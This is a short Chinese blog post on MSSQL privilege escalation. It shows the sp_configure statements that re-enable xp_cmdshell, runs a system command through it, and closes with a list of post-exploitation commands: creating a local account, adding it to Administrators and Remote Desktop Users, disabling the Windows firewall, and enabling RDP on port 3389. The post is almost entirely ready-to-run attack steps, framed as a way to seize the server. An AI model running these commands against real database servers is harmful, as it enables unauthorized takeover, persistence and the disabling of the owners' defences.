首页 > 数据库 >MSSQL数据库提权之XP_cmdshell提权

MSSQL数据库提权之XP_cmdshell提权

时间:2023-01-08 10:12:04浏览次数:43  
标签:configure cmdshell EXEC sp MSSQL 提权 xp XP

xp_cmdshell 默认在 mssql2000 中是开启的,在 mssql2005 之后的版本中则默认禁止。如果用户拥有管理员 sa 权限则可以用 sp_configure 重新开启它。

启用xp_cmdshell:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;

EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

关闭xp_cmdshell:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;

调用xp_cmdshell执行系统权限

 EXEC master..xp_cmdshell 'whoami';

至此,提权完毕(可通过添加账户等拿下该服务器权限)

添加用户、加入管理员组、关闭防火墙、开启3389等命令
#添加用户
net user {username} {password} /add
#将新添加的用户加入管理员组
net localgroup Administrators {username} /add
#将新添加的用户加入远程桌面组
net localgroup “Remote Desktop Users” {username} /add
#关闭系统防火墙
netsh advfirewall set allprofiles state off/on
#开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

标签:configure,cmdshell,EXEC,sp,MSSQL,提权,xp,XP
From: https://www.cnblogs.com/hgschool/p/17034152.html

相关文章

  • MySQL数据库提权之UDF提权和MOF提权
    UDF提权概念:udf的设计初衷是为了方便用户自定义一些函数,方便查询一些复杂的数据,同时也增加了使用udf提权的可能。攻击者通过编写调用cmd或者shell的udf.dll文件,并且导入......
  • express实现批量删除和分页
    后端代码批量删除//批量删除router.get('/manyDel',function(req,res){let{ids}=req.queryif(ids&&ids.length>0){//如果用户的值为空,不执行下面的......
  • express学会CRUD
    使用express搭建项目1==>express项目名-e2==>然后按照提示就可以了cd项目名3==>进入项目下载依赖cnpmi4==>启动项目nodemonapp.js5==>添加监听端口......
  • implicit和explicit求解器的一点比较
    implicitprocedure和explicitprocedure的比较abaqus有两个求解器:standard和explicit求解器。两个求解器在很多方面都有所差异:单元类型/材料行为等等。Choosingbetwee......
  • 自定义prometheus exporter
    packagemainimport( "flag" "github.com/gin-gonic/gin" "github.com/prometheus/client_golang/prometheus" "github.com/prometheus/client_golang/prometheus/......
  • lxml与XPath
    lxml与XPath​ 尽管正则表达式处理字符串的能力非常强,但编写功能强大的正则表达式并不容易,而且难以维护,复杂的正则表达式也并不容易理解​ 幸好还有其他的方式处理字符串......
  • 高级性能01-prometheus常⽤exporter下载地址⼤全
    1.node_exporter下载​​​https://github.com/prometheus/node_exporter/releases​​​2.blackbox_exporter下载​​https://github.com/prometheus/blackbox_exporter/r......
  • DELL XPS台式机开机无反应的某个方法
    有台XPS台式机,特别灵异,插上电源按开机键无任何反应,有时候过一天又能开机了。今天又遇到一次灵异事件,拿来电脑,上电,开机,。。。。风扇都不带转的,后来实在没办法,换电源/强制碰......
  • python_selenium元素定位_xpath(2)
     selenium自动化脚本最基础的就是元素定位和元素操作,下面就以百度为例介绍最常见的xpath定位方式基本定位方式:以百度的搜索框为例fromseleniumimportwebdriverim......
  • Linux提权之SUID提权
    概念SUID是一种对二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属主的权限若是对一些特殊命令设置了SUID,那么就会有被提权的风险,常用的SUID提权命令有......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99